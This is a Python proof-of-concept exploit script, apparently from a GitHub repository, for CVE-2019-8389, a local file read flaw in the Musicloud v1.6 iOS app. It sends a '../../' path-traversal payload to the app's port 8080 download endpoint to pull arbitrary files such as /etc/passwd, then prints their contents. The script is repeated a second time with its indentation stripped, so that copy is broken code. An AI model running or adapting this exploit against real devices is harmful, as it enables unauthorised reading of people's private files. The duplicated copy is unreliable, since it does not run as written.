shawarkhanethicalhacker/Musicloud-exploit.py

## Musicloud-exploit.py
#!/usr/bin/python
# Proof of concept for CVE-2019-8389
# Exploit author: Shawar Khan

import sys
import requests

def usage():
	print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n"

try:
	ip        =  sys.argv[1]
	path      =  sys.argv[2]
	downfile  =  path.split('/')[::-1][0]
	cur_fold  =  '../../../../../../..'+path[:-len(downfile)]

	print '''
	Musicloud v1.6 iOS - Local File Read exploit
	CVE: CVE-2019-8389
	Author: Shawar Khan ( @shawarkhanethicalhacker )
	'''

	def create_archive(file,payload):

		post_data = {
			"downfiles"  : file,
			"cur-folder" : payload
		}

		print "[+] Injecting Payload..."
		try:
			inj_status = requests.post('http://'+str(ip)+':8080/download.script',data=post_data)

			if "MusicPlayerArchive.zip" in inj_status.text and inj_status.status_code==200:
				print "[+] Payload successfully injected"
			elif inj_status.status_code==404:
				print "[+] Payload injection failed, File not found"
				exit()
			else:
				print "[+] Payload injection failed!"
				exit()
		except(requests.exceptions.ConnectionError) as err:
			print '[+] Payload injection failed! Connection refused.'
			exit()


	def retrieve_content():

		print "[+] Retrieving MusicPlayerArchive.zip"
		zip_content = requests.get('http://'+str(ip)+':8080/MusicPlayerArchive.zip')

		if zip_content.status_code==200:
			print "[+] Successfully retrieved MusicPlayerArchive.zip!\n\n[i] Printing content of %s:\n"%path
			archive = zip_content.text.splitlines()
			for i in range(2):
				archive.pop()
				archive.pop(0)

			print '\n'.join(archive)
		else:
			print "[+] Error retrieving content!"


	create_archive(downfile,cur_fold)
	retrieve_content()

except(IndexError):
	usage()
	#!/usr/bin/python
	# Proof of concept for CVE-2019-8389
	# Exploit author: Shawar Khan

	import sys
	import requests

	def usage():
	print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n"

	try:
	ip = sys.argv[1]
	path = sys.argv[2]
	downfile = path.split('/')[::-1][0]
	cur_fold = '../../../../../../..'+path[:-len(downfile)]

	print '''
	Musicloud v1.6 iOS - Local File Read exploit
	CVE: CVE-2019-8389
	Author: Shawar Khan ( @shawarkhanethicalhacker )
	'''

	def create_archive(file,payload):

	post_data = {
	"downfiles" : file,
	"cur-folder" : payload
	}

	print "[+] Injecting Payload..."
	try:
	inj_status = requests.post('http://'+str(ip)+':8080/download.script',data=post_data)

	if "MusicPlayerArchive.zip" in inj_status.text and inj_status.status_code==200:
	print "[+] Payload successfully injected"
	elif inj_status.status_code==404:
	print "[+] Payload injection failed, File not found"
	exit()
	else:
	print "[+] Payload injection failed!"
	exit()
	except(requests.exceptions.ConnectionError) as err:
	print '[+] Payload injection failed! Connection refused.'
	exit()


	def retrieve_content():

	print "[+] Retrieving MusicPlayerArchive.zip"
	zip_content = requests.get('http://'+str(ip)+':8080/MusicPlayerArchive.zip')

	if zip_content.status_code==200:
	print "[+] Successfully retrieved MusicPlayerArchive.zip!\n\n[i] Printing content of %s:\n"%path
	archive = zip_content.text.splitlines()
	for i in range(2):
	archive.pop()
	archive.pop(0)

	print '\n'.join(archive)
	else:
	print "[+] Error retrieving content!"



	create_archive(downfile,cur_fold)
	retrieve_content()

	except(IndexError):
	usage()